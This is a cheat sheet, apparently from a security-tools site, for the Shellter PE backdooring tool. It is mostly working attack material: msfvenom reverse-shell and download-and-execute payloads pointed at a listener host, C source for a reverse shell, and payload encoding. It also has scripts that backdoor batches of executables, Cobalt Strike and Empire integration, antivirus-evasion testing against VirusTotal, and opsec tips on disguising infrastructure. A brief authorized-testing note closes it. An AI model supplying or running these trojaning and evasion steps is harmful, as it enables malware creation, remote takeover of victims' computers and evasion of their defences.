Appearance
Shellter Cheat Sheet
Overview
Shellter is a dynamic shellcode injection tool designed to inject shellcode into native Windows applications through sophisticated PE (Portable Executable) backdooring techniques. Developed by Kyriakos Economou, Shellter represents a significant advancement in antivirus evasion technology by utilizing dynamic analysis and intelligent injection methods that make detection extremely difficult for traditional security solutions. Unlike static injection tools, Shellter performs runtime analysis of target applications to identify optimal injection points and execution flows.
The core innovation of Shellter lies in its dynamic approach to PE modification. Rather than simply appending shellcode to executables or using predictable injection patterns, Shellter analyzes the target application's execution flow during runtime to identify suitable locations for shellcode injection. This dynamic analysis ensures that the injected code integrates seamlessly with the original application's functionality while maintaining stealth and avoiding common detection signatures used by antivirus engines.
Shellter supports both automatic and manual injection modes, providing flexibility for different use cases and skill levels. The automatic mode handles the entire injection process intelligently, while manual mode allows experienced users to fine-tune injection parameters for specific scenarios. The tool's ability to maintain the original application's functionality while adding malicious capabilities makes it particularly valuable for creating convincing trojaned applications that can bypass security controls and establish persistent access to target systems.
Installation
Windows Installation
Installing Shellter on Windows systems:
bash
# Download Shellter from official source
# Visit: https://www.shellterproject.com/download/
# Extract Shellter archive
unzip shellter.zip -d C:\Tools\Shellter
# Navigate to Shellter directory
cd C:\Tools\Shellter
# Verify installation
shellter.exe --help
# Install Visual C++ Redistributables (if needed)
# Download from Microsoft official siteLinux Installation (Wine)
Running Shellter on Linux using Wine:
bash
# Install Wine
sudo apt update
sudo apt install wine winetricks
# Configure Wine
winecfg
# Install Visual C++ Redistributables
winetricks vcrun2019
# Download and extract Shellter
wget https://www.shellterproject.com/shellter/latest/shellter.zip
unzip shellter.zip -d ~/shellter
# Run Shellter through Wine
cd ~/shellter
wine shellter.exeDocker Environment
bash
# Create Dockerfile for Shellter
cat > Dockerfile << 'EOF'
FROM ubuntu:20.04
RUN apt-get update && apt-get install -y wine
COPY shellter/ /opt/shellter/
WORKDIR /opt/shellter
CMD ["wine", "shellter.exe"]
EOF
# Build container
docker build -t shellter .
# Run Shellter in container
docker run -it -v $(pwd):/workspace shellterBasic Usage
Automatic Mode
Using Shellter in automatic mode:
bash
# Start Shellter in automatic mode
shellter.exe
# Select operation mode
A # Automatic mode
# Choose PE target
C:\path\to\target.exe
# Enable stealth mode
Y # Yes to stealth mode
# Select payload type
L # Listed payloads
1 # Meterpreter_Reverse_TCP
# Configure payload parameters
LHOST: 192.168.1.100
LPORT: 4444
# Verify injection
# Shellter will automatically inject and save backdoored executableManual Mode
Using Shellter in manual mode for advanced control:
bash
# Start Shellter in manual mode
shellter.exe
# Select operation mode
M # Manual mode
# Choose PE target
C:\path\to\target.exe
# Analyze target application
# Shellter will perform dynamic analysis
# Select injection method
1 # IAT Hooking
2 # Inline Hooking
3 # Thread Hijacking
# Choose injection point
# Select from available locations
# Provide custom shellcode
C:\path\to\custom_shellcode.bin
# Configure injection parameters
# Set specific options based on analysisStealth Mode
Enabling advanced stealth features:
bash
# Enable stealth mode during injection
Y # Enable stealth mode
# Polymorphic engine options
Y # Enable polymorphic engine
# Anti-emulation techniques
Y # Enable anti-emulation
# Junk code insertion
Y # Insert junk code
# Control flow obfuscation
Y # Enable CFOAdvanced Features
Custom Shellcode Injection
Injecting custom shellcode payloads:
bash
# Generate custom shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > custom_payload.bin
# Use custom shellcode in Shellter
shellter.exe
M # Manual mode
C:\target\application.exe
C # Custom shellcode
C:\path\to\custom_payload.bin
# Configure injection parameters
# Select optimal injection point
# Apply stealth techniquesMulti-Stage Payloads
Implementing multi-stage payload delivery:
bash
# Create stage 1 payload (small downloader)
msfvenom -p windows/download_exec URL=http://192.168.1.100/stage2.exe -f raw > stage1.bin
# Inject stage 1 with Shellter
shellter.exe
A # Automatic mode
C:\target\application.exe
Y # Stealth mode
C # Custom payload
C:\path\to\stage1.bin
# Host stage 2 payload
python3 -m http.server 80Polymorphic Injection
Using polymorphic techniques for evasion:
bash
# Enable polymorphic engine
shellter.exe
A # Automatic mode
C:\target\application.exe
Y # Stealth mode
Y # Polymorphic engine
# Configure polymorphic options
3 # High polymorphism level
Y # Enable junk code insertion
Y # Enable instruction substitution
Y # Enable dead code insertionAnti-Analysis Features
Implementing anti-analysis techniques:
bash
# Enable anti-debugging
Y # Anti-debugging techniques
# Enable anti-VM detection
Y # Anti-virtualization
# Enable anti-emulation
Y # Anti-emulation techniques
# Enable sandbox evasion
Y # Sandbox evasion
# Configure timing delays
5000 # Milliseconds delay before executionPayload Generation
Metasploit Integration
Generating payloads for Shellter injection:
bash
# Generate reverse TCP payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > meterpreter.bin
# Generate reverse HTTPS payload
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f raw > meterpreter_https.bin
# Generate bind TCP payload
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f raw > meterpreter_bind.bin
# Generate encoded payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f raw > encoded_payload.binCustom Payload Development
Creating custom payloads for injection:
c
// Simple reverse shell payload
#include <winsock2.h>
#include <windows.h>
void reverse_shell() {
WSADATA wsaData;
SOCKET s;
struct sockaddr_in server;
WSAStartup(MAKEWORD(2,2), &wsaData);
s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
server.sin_family = AF_INET;
server.sin_port = htons(4444);
server.sin_addr.s_addr = inet_addr("192.168.1.100");
connect(s, (struct sockaddr *)&server, sizeof(server));
// Duplicate handles for cmd.exe
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)s;
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
}Payload Encoding
Encoding payloads for evasion:
bash
# XOR encoding
python3 -c "
import sys
key = 0xAA
with open('payload.bin', 'rb') as f:
data = f.read()
encoded = bytes([b ^ key for b in data])
with open('encoded_payload.bin', 'wb') as f:
f.write(encoded)
"
# Base64 encoding
base64 -w 0 payload.bin > payload_b64.txt
# Custom encoding script
python3 encode_payload.py payload.bin encoded_payload.binAutomation Scripts
Batch Processing
bash
#!/bin/bash
# Shellter batch processing script
TARGET_DIR="targets"
OUTPUT_DIR="backdoored"
PAYLOAD_FILE="payload.bin"
mkdir -p $OUTPUT_DIR
echo "Starting batch Shellter processing"
for exe_file in $TARGET_DIR/*.exe; do
filename=$(basename "$exe_file")
output_file="$OUTPUT_DIR/backdoored_$filename"
echo "Processing: $filename"
# Create Shellter automation script
cat > shellter_auto.txt << EOF
A
$exe_file
Y
C
$PAYLOAD_FILE
$output_file
EOF
# Run Shellter with automation
wine shellter.exe < shellter_auto.txt
echo "Completed: $filename"
done
echo "Batch processing completed"Payload Testing
python
#!/usr/bin/env python3
# Shellter payload testing script
import subprocess
import os
import time
class ShellterTester:
def __init__(self, shellter_path, target_exe):
self.shellter_path = shellter_path
self.target_exe = target_exe
self.results = []
def test_payload(self, payload_file, output_file):
"""Test payload injection with Shellter"""
# Create automation script
automation_script = f"""A
{self.target_exe}
Y
C
{payload_file}
{output_file}
"""
try:
# Run Shellter
process = subprocess.Popen(
[self.shellter_path],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
stdout, stderr = process.communicate(automation_script)
# Check if injection was successful
if os.path.exists(output_file):
file_size = os.path.getsize(output_file)
self.results.append({
'payload': payload_file,
'output': output_file,
'success': True,
'size': file_size
})
return True
else:
self.results.append({
'payload': payload_file,
'output': output_file,
'success': False,
'error': stderr
})
return False
except Exception as e:
print(f"Error testing payload {payload_file}: {e}")
return False
def generate_report(self):
"""Generate test report"""
print("Shellter Testing Report")
print("=" * 50)
for result in self.results:
print(f"Payload: {result['payload']}")
print(f"Success: {result['success']}")
if result['success']:
print(f"Output Size: {result['size']} bytes")
else:
print(f"Error: {result.get('error', 'Unknown')}")
print("-" * 30)
# Usage
tester = ShellterTester("wine shellter.exe", "target.exe")
tester.test_payload("payload1.bin", "backdoored1.exe")
tester.test_payload("payload2.bin", "backdoored2.exe")
tester.generate_report()AV Evasion Testing
python
#!/usr/bin/env python3
# Antivirus evasion testing for Shellter
import requests
import hashlib
import time
class AVEvasionTester:
def __init__(self, vt_api_key):
self.vt_api_key = vt_api_key
self.base_url = "https://www.virustotal.com/vtapi/v2"
def upload_file(self, file_path):
"""Upload file to VirusTotal"""
url = f"{self.base_url}/file/scan"
with open(file_path, 'rb') as f:
files = {'file': f}
params = {'apikey': self.vt_api_key}
response = requests.post(url, files=files, params=params)
if response.status_code == 200:
return response.json()['scan_id']
else:
return None
def get_report(self, scan_id):
"""Get scan report from VirusTotal"""
url = f"{self.base_url}/file/report"
params = {'apikey': self.vt_api_key, 'resource': scan_id}
response = requests.get(url, params=params)
if response.status_code == 200:
return response.json()
else:
return None
def test_evasion(self, file_path):
"""Test file against multiple AV engines"""
print(f"Testing evasion for: {file_path}")
# Upload file
scan_id = self.upload_file(file_path)
if not scan_id:
print("Failed to upload file")
return None
# Wait for scan completion
print("Waiting for scan completion...")
time.sleep(60)
# Get report
report = self.get_report(scan_id)
if report and report['response_code'] == 1:
positives = report['positives']
total = report['total']
print(f"Detection rate: {positives}/{total}")
print(f"Evasion rate: {((total - positives) / total) * 100:.2f}%")
return {
'file': file_path,
'positives': positives,
'total': total,
'evasion_rate': ((total - positives) / total) * 100
}
return None
# Usage
tester = AVEvasionTester("your_vt_api_key")
result = tester.test_evasion("backdoored_app.exe")Integration Examples
Metasploit Integration
ruby
# Metasploit module for Shellter automation
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Shellter Automatic Backdoor Generation',
'Description' => 'Automates Shellter for PE backdooring',
'Author' => ['Your Name'],
'License' => MSF_LICENSE
))
register_options([
OptString.new('TARGET_EXE', [true, 'Target executable path']),
OptString.new('LHOST', [true, 'Listener host']),
OptInt.new('LPORT', [true, 'Listener port', 4444])
])
end
def run
target_exe = datastore['TARGET_EXE']
lhost = datastore['LHOST']
lport = datastore['LPORT']
print_status("Generating payload...")
# Generate payload
payload_data = generate_payload_exe({
'Format' => 'raw',
'Options' => {
'LHOST' => lhost,
'LPORT' => lport
}
})
# Save payload to file
payload_file = "/tmp/payload.bin"
File.write(payload_file, payload_data)
# Run Shellter
print_status("Running Shellter...")
automation_script = "A\n#{target_exe}\nY\nC\n#{payload_file}\n"
cmd = "echo '#{automation_script}' | wine shellter.exe"
system(cmd)
print_good("Backdoor generation completed")
end
endCobalt Strike Integration
bash
#!/bin/bash
# Cobalt Strike and Shellter integration
CS_HOST="192.168.1.100"
CS_PORT="50050"
TARGET_EXE="legitimate_app.exe"
# Generate Cobalt Strike beacon
echo "Generating Cobalt Strike beacon..."
./cobaltstrike/beacon_generator.sh -h $CS_HOST -p $CS_PORT -o beacon.bin
# Use Shellter to inject beacon
echo "Injecting beacon with Shellter..."
cat > shellter_automation.txt << EOF
A
$TARGET_EXE
Y
C
beacon.bin
backdoored_app.exe
EOF
wine shellter.exe < shellter_automation.txt
echo "Backdoored application created: backdoored_app.exe"Empire Integration
python
#!/usr/bin/env python3
# Empire and Shellter integration
import requests
import base64
class EmpireShellterIntegration:
def __init__(self, empire_url, empire_token):
self.empire_url = empire_url
self.headers = {'Authorization': f'Bearer {empire_token}'}
def generate_stager(self, listener_name):
"""Generate Empire stager"""
url = f"{self.empire_url}/api/stagers"
data = {
'StagerName': 'windows/launcher_bat',
'Listener': listener_name
}
response = requests.post(url, json=data, headers=self.headers)
if response.status_code == 200:
stager_data = response.json()
return base64.b64decode(stager_data['Output'])
return None
def create_shellter_payload(self, stager_data, target_exe):
"""Create Shellter payload with Empire stager"""
# Save stager to file
with open('empire_stager.bin', 'wb') as f:
f.write(stager_data)
# Create Shellter automation script
automation_script = f"""A
{target_exe}
Y
C
empire_stager.bin
empire_backdoored.exe
"""
# Execute Shellter
import subprocess
process = subprocess.Popen(
['wine', 'shellter.exe'],
stdin=subprocess.PIPE,
text=True
)
process.communicate(automation_script)
return 'empire_backdoored.exe'
# Usage
integration = EmpireShellterIntegration("http://empire-server:1337", "your_token")
stager = integration.generate_stager("http_listener")
backdoored_exe = integration.create_shellter_payload(stager, "target.exe")Troubleshooting
Common Issues
Wine Compatibility Issues:
bash
# Install required Wine components
winetricks vcrun2019 corefonts
# Configure Wine for Windows 10
winecfg
# Set Windows version to Windows 10
# Install additional dependencies
winetricks d3dx9 vcrun2017 dotnet48
# Check Wine logs
export WINEDEBUG=+all
wine shellter.exePE Analysis Failures:
bash
# Verify target executable
file target.exe
# Check PE structure
objdump -p target.exe
# Verify executable permissions
chmod +x target.exe
# Test with different target
# Some packed executables may not workInjection Failures:
bash
# Check payload size
ls -la payload.bin
# Verify payload format
hexdump -C payload.bin | head
# Test with smaller payload
msfvenom -p windows/exec CMD=calc.exe -f raw > test_payload.bin
# Use manual mode for better control
# Select different injection pointsDebugging
Enable detailed debugging:
bash
# Enable Wine debugging
export WINEDEBUG=+dll,+module
wine shellter.exe
# Monitor file operations
strace -e trace=file wine shellter.exe
# Check system resources
top -p $(pgrep wine)
# Monitor network activity
netstat -an | grep wineSecurity Considerations
Operational Security
File Handling:
- Use isolated testing environments
- Secure deletion of temporary files
- Encrypt payload storage
- Monitor file access logs
- Regular cleanup procedures
Network Security:
- Use VPN for payload delivery
- Implement traffic encryption
- Monitor for detection
- Use legitimate-looking domains
- Regular infrastructure rotation
Legal and Ethical Considerations
Authorized Testing Only:
- Obtain proper written authorization
- Define clear scope and limitations
- Document all activities
- Follow responsible disclosure
- Respect system integrity
Best Practices:
- Use in controlled environments
- Regular security assessments
- Implement detection measures
- Monitor for unauthorized use
- Maintain audit trails